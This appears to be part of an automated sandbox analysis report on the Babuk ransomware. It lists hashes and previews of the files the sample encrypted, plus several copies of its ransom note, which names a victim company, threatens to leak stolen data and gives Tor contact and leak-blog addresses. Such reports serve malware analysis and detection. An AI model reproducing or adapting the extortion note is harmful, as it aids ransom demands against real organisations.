                                                                            Preview: J~..9.,,Woa....\.$...k1Oa...(<....;u.s.e.I.G........>i..R:|.#g.e6.p.l.G-i..(6n.".......1.-..hu.-J.#.v.(.Wf.D.....g..C5-..Jt.H..qP/.@.m0B..........u....+.!..Q...b.....MV ...;./.....F\...R7"a...-.uFJ..u.<.].r...I#..D...&}W7."..#....c1.:.!b...x.NE..........R...../....6...=....eQ....!...5Cv..j.0.Pb.^......7..M..M.Z.D.wVn........D.V.E......22..Z]&.T.?.VO.&.>TW.G.'c0.. ...R...**..G...mP..~.8.....O2.Vh..r...v.7..........hF.p?..*.Jm.....M..6..o.F8.P.R.....v-w..k.>.psE......Vk..M..........gTNp..V,)-^.u...IO..3lk...=W..pK..:..K....CI..s........F.....7..9.a.h....3....2..E....kXh...j..v..>9.../..#......!.c...!...S.(..w...y.K...'C.KE......,.7.C......&.$|...~&.r..T8..|....H.#.......UG.L..{...e...&..D.E....l...q..Eb..v..?.S....x.$.. b..+....p5..?.....*.]....*.%.d\{...f..u......'e.%j+..P.G....q..M-m,M.~.......h...1...T.2.....r...;...i..Q.c..(7RBx....F....X.9.%.0..t..Y..$..{.96x.1..%7...h....X..J.N. .:W.:#.`."...^C..d....fF%D..r.Fu.U.:..&...MUU-..
                                                                            C:\Users\user\Downloads\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.813882786386346
                                                                            Encrypted:false
                                                                            SSDEEP:24:OrFXa+c+m2g6eEoX/Vi5Y/NOC+NMNTaDq5q4fDQUTW6WcJY:OrFqN+mCodi5MsCYMNTaDq54j5J
                                                                            MD5:9CCE1DC01AFB547883F0B107BD57B3A2
                                                                            SHA1:8F30F7CB05F1A38FA50B42C634E9527DC33B7CE5
                                                                            SHA-256:BD5EE45025D328951E07AE4A2AEE31FA5B6830907BDF99BE8676B2FAF1C9FECA
                                                                            SHA-512:CE782D0E464AF4B22BBAF16EBE6DC5B3C99B10B96B6AFA234C7FF9B03EC142704746D2E7C00071C9BE446AB528CEFC2F5964EBF273AB997CECAD1C50B29A8BA7
                                                                            Malicious:false
                                                                            Preview: d...g..o..<.....W|.g..w....\...;SO...W...q..L.....A.E..`1.......j..+..O.0.....b...+..[./..n...w...O....%.....).yr.......'V[.g....J....,..WB.l.....F...(.x..K..{_.}..&..?4..\.U|e..xz.U..S..6....4....s..*._..T.T...N?...rUx}.g?....u..n..8j.....%W...`..&.......d....@.N..........G....kr..cb.tG0...W>cE.....u..h.......gB J..9/....p...k...f.Q.Ug.P.h....9..e.^..P..`........+..le@z...............Jn.....~V...... ...5..j.O!...yg..s..1..65....... ......u..L.P|.>(ea(.........V...4....y.)L.."\.......|c.?..(x.'.z.c.N.=._..RZ,.9.nld.9...#.r2.f8.w......#.a..V...tm...........m!..{sU.z.....k.....6{..*D..9:2...Tr..........]..L....,..5H.TQ%.#...%fw(h.N...}...F.&...: ..~..f.J(..IFtY2....#...C...5F..}..#,...k7. t....a..7y..l..jw..o4.!..e......N.@.V.y|Qr..5.e.N...t.uA.=6;9A ...4Cq"..y..,.0m.V......^,.`h.O..Icc...v.I..6.6..q[.0..\R..o..x.t....#.......~0=t.E.|B.g-("i.\C.....Dr....;..f.P..B..~..C..o..&..=.*:.!M.P@D).L. ...Z."h...do.!..s@....!
                                                                            C:\Users\user\Downloads\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.83114926173514
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZzfSSHtL1ITb2mIKg8sA7s4we7Ory4APxhvV8E4H7AML:VfSk+H+KdsOYeqr+oL
                                                                            MD5:1B712C1C9DCD0779EDD1204B5A01575E
                                                                            SHA1:64CA4AF57F91BC8010EBBD940C5C06CC7F9C003A
                                                                            SHA-256:943FFDF1FB84F7659969148D2E97A65BD4E3F2A9038BE1B775F58D4C58E6936C
                                                                            SHA-512:9D541E88C111D666F1474DB3B53C52E83E5DA5007E7687D9923112BADA17A20A6543F1A589BA220C2530FDED15F120E1568D8B9B1CA5324B223BDD6D6DBFDBF8
                                                                            Malicious:false
                                                                            Preview: N..Z..`>e....A.qI..$.my..k.........>..n..&."..v........}6..;.4.*L..qf.'..S.C....Y..}..=..y.h..\.C[....w.c._^.......K..j.l..XVT.....8.W .......h....P..n.0..q..'..8h.P....K...F.$.fO.Ap.o.*....iU!}....V.Y.....E....5.:..-.;..oNU....'..6...E._...O......c.b..FK.\L..1%.#+....@...^...|q6....=].:. .Y|"..^R<E.....P,m....."..r..J[...F...Ci......t..aMq.0.)I..].r.G.G.r..O..'v....}......W.......m...m....c.N.)G.5/.9.N&..'..c.Q.2...'pp..e.G..t.SC..Q...s.1..gM..%..~.3v...b..:.....Z..A.....He?8C.6..U...N.F..p^'0G..........o..| k...c.L..~.i..|..b.&....do.^..OM^i.%Ck.s..3u.f.md...6.pW[.5.7v.q..F.D+..R.f.o..Y\.r....&61$.P.q};"..L...`.2u...t....2...6.%t>{.L....X.....=S=_R.o.....'.....A.K9.'.D..r.<.....{.u_..{+-u.e......?.X$...{.....A.........?...D.1....r.t?.............b.s.E.e.~.e.(..%..1j. .......3.J.........*.a.iJ.m...L?ge.Z.|.u.#R..?[..QI.|..t.......05T..ca.,=.yd.F..J...g.cA.).N..........<.k.QN*.+...*..un.....C....= u.C........v.ns.....+.y7.v.9.1.....
                                                                            C:\Users\user\Favorites\Amazon.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):279
                                                                            Entropy (8bit):7.105063853075984
                                                                            Encrypted:false
                                                                            SSDEEP:6:t8B2hPzLe6L1gWRKrcaJD+oruJqfYvuh5RaX+VSBQbid0vtn:sELdXRKAm+orJquDaX+VOQbiK
                                                                            MD5:372B6A9512AF87B99110E470C6EC9BA6
                                                                            SHA1:984B9578F621C699CE2167F655CC2C2F9B4173F5
                                                                            SHA-256:EED80A2113BF8588ADB559E57D3446E024BCF0FE7B4E062F3D5E3AF31037FD62
                                                                            SHA-512:E9C3AE08C535FFF40C88FA9A1F3541528CEF25E7C4B434A11C29F5A1948E6EB551310A0DBD89318F09A828F08738C1416266CB626438A58230E3EB86190EBD61
                                                                            Malicious:false
                                                                            Preview: .w">Y..NV"_....<..bi...e.Cq...o.[....c.0.&......g...SK..:._z.D..y.7.SW.e.WJ...8@'Q86.g5....E.oz.|.bY.z.....m....!y..........P...k..O.xV7(-..F..J.4.X..I.......]...zv...b(.NM/?.....@..[..]...j...h.V.a}..........{..u.;..Tp.._..j....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Bing.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):376
                                                                            Entropy (8bit):7.373793532655735
                                                                            Encrypted:false
                                                                            SSDEEP:6:KDEdwZFkWvtByszkPQSOjiCJ9vJXejkG/IW/QG/5nLqNrjXbHZsrIb1CL0vtn:U0tW1ByLQfXxXtWIQ5KjXLJgs
                                                                            MD5:0A3B01C5EC66F9E62E259AA1EDC7554A
                                                                            SHA1:FD2F44A82CC55250A486254F23552A26F4ACF233
                                                                            SHA-256:E97EADA364285C9413B829532EE1C8EFFC8B80238F855574BAB4B497CA51992B
                                                                            SHA-512:E9C5C563BE02D20C3F550BEF01308EA866997E3F06118483EC2C555484B56E86D5CAF03DE6ADC6236789980FCB40E6A84E627A42C8E67C8BB5166A4791E56B7A
                                                                            Malicious:false
                                                                            Preview: .z.y.,.sUB...3'.*.x...Q....Q-.;.<T.}.'g,.....@.....!.E.._....0gIb..L.....QZfV.}..=..P......ws.......\..Q...u.~..o.MLh.RA..Pw..&d.`.....J.B......f.....K+.5.'...2v..~..1R9D.o....t..C.Z..u|..................v.._....p.&..6..4.....=Vs.......+.a?.h3..]...../...Ih...^.DC.h.......L..E*S..4<...+......T}.....z].O.EJ.4C....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Facebook.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):281
                                                                            Entropy (8bit):7.082753243954591
                                                                            Encrypted:false
                                                                            SSDEEP:6:WljOPhZqxm8fjwrYYmwi4mbt+5YARSC6+mO90vtn:WIPh0jwrYBuHa+mOq
                                                                            MD5:6586BA435DC884DC1D836C7AE22DC19B
                                                                            SHA1:8D9FA49884FB1829D8904E50225427DB7393672F
                                                                            SHA-256:30AAD30D15368CADE43DFB740054E501E6C746DD51B1431DE52B9E89ACCA9852
                                                                            SHA-512:6A1E615973BF9DCE45691C2BE19F3A975AED9A2465632142E511AD7B3704EA71B7362A3D29469DAB6F4B5034E838D8023EC21A8FF1562D64EA9EEBFBB9AF330E
                                                                            Malicious:false
                                                                            Preview: .f..MU.t....HW.~....#.Ed..,.L.OE...&.D!..@T.../.^..\K;..$../>=...p..) ..4E..$g...xsgH 1I..##.P..Gu..p.....q&q......\<.q?p..r.j.].f.......}.........$a.V.X.)....P&A...t...jh.I.Z.e..Y.^>zkf)HP`;B$....6.....7v.d!.O.W.@~I...}j.2.E.....*L.:....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Google.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):279
                                                                            Entropy (8bit):7.090726935513259
                                                                            Encrypted:false
                                                                            SSDEEP:6:jQfhsUM3xvfyjKFDINmLAo+c4YArRo8wd5hodO0vtn:jQs3xXsKlFTcYf7+b
                                                                            MD5:B472454ECE004117D6108C8B3983F335
                                                                            SHA1:EE9B71C832A45C48592F3C70BA657A58A89AD01D
                                                                            SHA-256:E95C12BF0ADBFC7602939E978CCB7652DEA909135010E94427258EA60D34963A
                                                                            SHA-512:93321143FEF121AA8A25C30C82AA7516F2D32CDEE2727E37F239B0F93F82B3C4A427CE0A51FC54D9FFB8472228E2B503D9420F5CE58003FE7F9C13900AFD7729
                                                                            Malicious:false
                                                                            Preview: .).m..da...pQ....K..n.D4...ihE.x.|qH*...V#>..|....!....e.W....2+..'&.....z.2gR..{y..t...h."a......u.s..}K......v.X*.<........W..CE..FIX...J^R.T...c..^.;.b N....yi..J...iw[S.S.d.HB..ih.......2.....mL...XM.vl>.......BL...,z.......z*.....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Favorites\Links\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Favorites\Live.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):277
                                                                            Entropy (8bit):6.979477422464105
                                                                            Encrypted:false
                                                                            SSDEEP:6:nSeTKFT9iPudvgEm90gs4VCGdb3OiSoxD/vNhtBr0vtn:Seqli90IMGB8oF/vNXe
                                                                            MD5:C56D28D96671CF1727CC01D5CD141FAD
                                                                            SHA1:EAC0B902CBC2D4D7FD89BD89720ED5F3A0296508
                                                                            SHA-256:E8D92EF91CCFF4F0219F1C599386F92815520901FB56EF4C73EAEE7882F2D0D6
                                                                            SHA-512:9BB2C8A3A8971438A38ECB60C99E9478FF0967D8420B7086121946E569401CD828D0C4B45DA7692C45596E2194A3DE7A2CBE1D4A783B153E34C73A3B3D79862D
                                                                            Malicious:false
                                                                            Preview: 9.|..!.(..b9....p Xi..o.>..2.j.M#...d...5..w..D...4....o.7,x......%..';.(..o.4..s.D..C.....n..0z.'..b.........<..0.R5...(..R......K.8. 5C.S...f.?...".Q...N....}e...P;.....i..<B...U...#D.=.R?. .....Z..N.u+g.~b....s.Y.C....~.1...),w....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\NYTimes.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):7.187840204552309
                                                                            Encrypted:false
                                                                            SSDEEP:6:nq8AAVUEnzGLx6c/542021bkcW6xXhHXl8S920vtn:q8TVUGz6ggNkcW2FVH
                                                                            MD5:D005D4770B51664E7E0C0067F5483898
                                                                            SHA1:F466B90DE60F22C2D7AC62932225F0895E2536BC
                                                                            SHA-256:F538355A581444496F2D3225EB90A7A36FB4D67E2796F31B044712923959E158
                                                                            SHA-512:4137072B7AAC7516F8A7DADC22A44735A2DE670EFF4D67EF30131840BFFE3F47DB08644E2DD90C7598A47576BEA44ADFA2A9A989B58917DABB95B1031B5C8F07
                                                                            Malicious:false
                                                                            Preview: .+.D.)..8...A...&.......KmA?A0.:..a../...G#.Y$..Z.7Y_..K."Z,.F..wv....^.D]T...0v...b....Q...g..f.xp.....'.sa..[.dZX2..K.3....H.\.v.q8k.7\.\.....[...3!.].V?..]Rq.T.>..\bG...-. /.......(tR...k......)2W.-.P~f...F.._.;.\...{0S........choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Reddit.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):279
                                                                            Entropy (8bit):7.06952210769644
                                                                            Encrypted:false
                                                                            SSDEEP:6:UOhsVoUWmDZAuZjASNQ3ggh7efhFN5p3m0L0vtn:3hsj1DZ7aUSLoD7Zs
                                                                            MD5:A51CC84582C4483B671BB4D14865E651
                                                                            SHA1:FC26A408E882B30827A4B2F3BA5A4355CD8E7579
                                                                            SHA-256:148CFB120A3368594C848AD326249D0F896FEE97454C2F7378044C10FD2DE5A9
                                                                            SHA-512:2C7EC87B8235DCCEEE01314FEE4EBAD55896C458D876601B34FCA86960672566B51C7CE72315E5A7B5B8702563ECFAAEFE2EA02B640924BB927F582D6A460007
                                                                            Malicious:false
                                                                            Preview: .t.....D...9..!...........e....U g...18]...L....%.......>Ihi....Y.$z.b.....6.k.[.gZf..d.u3..r.....AM.......O...y./%.#q.c)].6V...i...V.+.E.....#.&#...~..|.>.$..4.}..Q./...Y7..3wY..+N.c).DD].DvVf....U....WM.. &.....$.UV....;..$`.....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Twitter.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):7.089451365189329
                                                                            Encrypted:false
                                                                            SSDEEP:6:16A2zkWGkGxpsz9CKZOdHYOiIs9KODj4Cp3HkyDeMaxy3s80vtn:moNbszdhnR7UyKPxyc7
                                                                            MD5:0247157A3265DC759F8973493910A17D
                                                                            SHA1:454D159D840E013F04C240A413D5CB9882B17F03
                                                                            SHA-256:CD388C8A7CC6DC3594C8F1FD42A3ADFA60A30DC6CDD480C935648FD35726DD6A
                                                                            SHA-512:F0D3760510368FCBC6DCEE937B0C658514E0224DA7260468551C67321E1DCE8765BD9D09E6FA80564C69E9EB65A6DE9088879B13C88900AEF4D61F5952D344CD
                                                                            Malicious:false
                                                                            Preview: &.~0.......).O.........z...}.5<e..TSe.v.$....n.N.2@....(y`.....$}1L..S!Tfb.K....V1..z...b~.44..?!.*&..X....2.8..(.Ey-..xv.x.8E.^..4.....[...1....T,.+....$...../.b.......y.}..a..X.T...f.;L....;i..;:....T....K" I...~.#zv0G..O..o.w....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Wikipedia.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):282
                                                                            Entropy (8bit):7.140519648404609
                                                                            Encrypted:false
                                                                            SSDEEP:6:kB3SHi76CaSYdASqnxsnQCHliBk5Lavri0vtn:kB3SCRaSYdAHgFp5LaDl
                                                                            MD5:BD7B8303B186B1E3D0B24964A7DEA1B3
                                                                            SHA1:7D6C84A8E206E1078D6EF91ED0F75D6D510E90EE
                                                                            SHA-256:7543A367E6F94B8567436FC2259C6C239D30564746A9C7CC1E5449A10B4C72BD
                                                                            SHA-512:59E89C4F863C083F0CDD227A47F8872C5401BB671B2EE31459FA3B245B00154F96962D18966DBAD4E7D6C46D6B2BC410F113E3A4C4A7048F243066A90A9FF161
                                                                            Malicious:false
                                                                            Preview: ......pD.... ..."gSR.q....Cc.,H...90......_BZ.....>0q.l....DbQH...4.8.mj..p~.6.&.M..........&........2........Xb... ..Dea...U0..t...L./......G$.g.6.3.n.4. ....1....5..J.........a.....O... ...Z.O...5......3....l....../._...yc........choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Youtube.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):7.043060106809963
                                                                            Encrypted:false
                                                                            SSDEEP:6:k9AVTezbt92+XslQfuK7S+kT96L4mA7OuyeWmGjwWXt50FQaL0vtn:KAVTk6+XAQfuK7FkTkcm0Y0Ls
                                                                            MD5:339781386103A4E7E3109317643937E5
                                                                            SHA1:8F4EA6580D1EB3306AF10043149C56C2607B31A6
                                                                            SHA-256:601CFAA6CD7B39A1FE79C61BFE399B2A022C18687023EE98FBFC6A12F3E9E749
                                                                            SHA-512:BB24E3140B2048F5E9C8DE0554AA1A9226C5044D39ABC9DBFB2BAF03000C0962A57252DC8226E5E736FE027BE07600503839D3799097FC3F041E3D06541950AF
                                                                            Malicious:false
                                                                            Preview: R..\l>.|Y`...(=y.?....g6-..J./ak_-F...e...^H..Z..T....d.C..F.^\j.G.O4..>).......-...od|......]k...5h..hT.fM.......x..j......%&...}m..f5.f...d..W....Xb..X..6...7...V.i}...Xl.]...fkn..>.K.Eh.7.P0..."5.<....y.s..A.B..+#.U|W...fF..M.\...)Y....choung dong looks like hot dog!!
                                                                            C:\Users\user\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Links\Desktop.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):669
                                                                            Entropy (8bit):7.656937485204007
                                                                            Encrypted:false
                                                                            SSDEEP:12:ub8MN3+gvwc9CuuiJUweDR/8DQ69n03wjrISOOq+T0/ywT6xeR:g/x9buqUweO590I+J/1TlR
                                                                            MD5:D969A0C5BD5E177A2A064C903DB575EE
                                                                            SHA1:98BE2E507452B9601E8E61E7179A0020B23B8704
                                                                            SHA-256:8D6D22FD596701E35EAF9A5B05D64DE02619C9883109D578D3DF0FD3CA050603
                                                                            SHA-512:06FE49A2434F47ED61F175BBFD492CF2775B4AE4043B4841212ECD83B8908C6B7B2B4DD0BA92BE75FBAF1D44C0BBB03702776A623BE6080A67FDE01B8C846615
                                                                            Malicious:false
                                                                            Preview: .UD..:)e.....T..i..d>....F.....M..........q.,..(@"..N.w%S...GX.o.....x]..r7.v.o.......>..N..&.........=.P...@.G..ia.w:.1.p.....}...e...4...Do.^...~G.dYN.:.q{<W.....>../.=...S.M.c........;wg9f..Y]k.U:2X!....,@........;....!...*bt..2...... Y../...L...e;)Z.9..x./.*.<.]IX.$......(..w.p.n..]....xg.&.!m3........u.D+.........j.~G.9.A...3H#......n....j@@4q-E.:.P.6G_Y+....F.y.Q.y.8=.)2(..m.....8....%uJ....p.j.\8......O"..O.....}.g.%.{.9kyJ|!2..$.).).............S2.../.]U.Hj.....cO.._...(...!.h..."t..T.......I..,Y.%D......30...x.........s.E/".1K..vX...S5J...9.xCZ.<.x....*.......N...3o....(9b.?.........choung dong looks like hot dog!!
                                                                            C:\Users\user\Links\Downloads.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1118
                                                                            Entropy (8bit):7.811346624115402
                                                                            Encrypted:false
                                                                            SSDEEP:24:vbZVGfMY4ANMlTKKCIF6siIzYVymet2xG7aSaJ:vbvGGAHKF6s3Y0meMxnZ
                                                                            MD5:973BDB17DD84C2CB0488C4344E1D364D
                                                                            SHA1:5B41FF6A44C9AB9DFF97D56873AC33E28FB5364F
                                                                            SHA-256:0B682BB4F051E576A1794F64B31D1EED6EFBC24A1E6C9968B73194D03562EBCE
                                                                            SHA-512:06DBE8EFED527D5AD2FD04C803105AA14DF5646AD8C60300558CA204D3D400DAB414B4A4A7D40882BD3558941BA6214D52420D8ECD752B35C76C0FD7B8AC5949
                                                                            Malicious:false
                                                                            Preview: .Q......)..2...Q(.F..G'....S......Do.w...o..b.....n.r=..f$..o|....q>+u_..a.!P...../........3...[5h..._|=\...b.m.>.tc.........l..d.NO.z.G-K.nu...6........It.L &b...'.Y.....1.U...H.F-.......4...A...5Mo.Z........g.....b..&.O.^..u...".I!........<zV..[l..b[`^(...z...8...f..........y...M.b..;..X..3*Gu}*q.L?.LE.. <.{ rJ.....s..d....;Hs..........$~..*..+.G.j.....%>..?%.......:../}roB...p.. .+6xL..k./+...DT..2..Z^=x..R&\....).....C..G.)m...j4....\.GL..c..<...3G....z......U..C0...Y._..Wc.O...l(w...p.....=....k..t....9. ....&8I..Z^g%.:..**J.r..>.N.{.kY.r....&.P.3..f..>:]/...-...{..R.b.\Vz._.@......w..@....:.%.~v..d.v...t..i..Od../.....%....V..X...... .$...n..3.j..z.D..3wU..{....m(Z..#c....v..?.....1......N._...Z.`g..u-[...?......._.....A"y.a......O.l..e.Ki.{.f.*t.M>l.?.k..(.iZ..7+.Q...A..1b^.$ef...cw........8!..{2.~.IQ@Z/a..n&uw.....%...@.......<$lYP6.M.u.<...M>..(.Q..].v.+..S.*..Pr].(...j.A.......9\Z.P.,.....[.......NZ..3.i..%.VL.L.N....[.
                                                                            C:\Users\user\Links\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Music\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
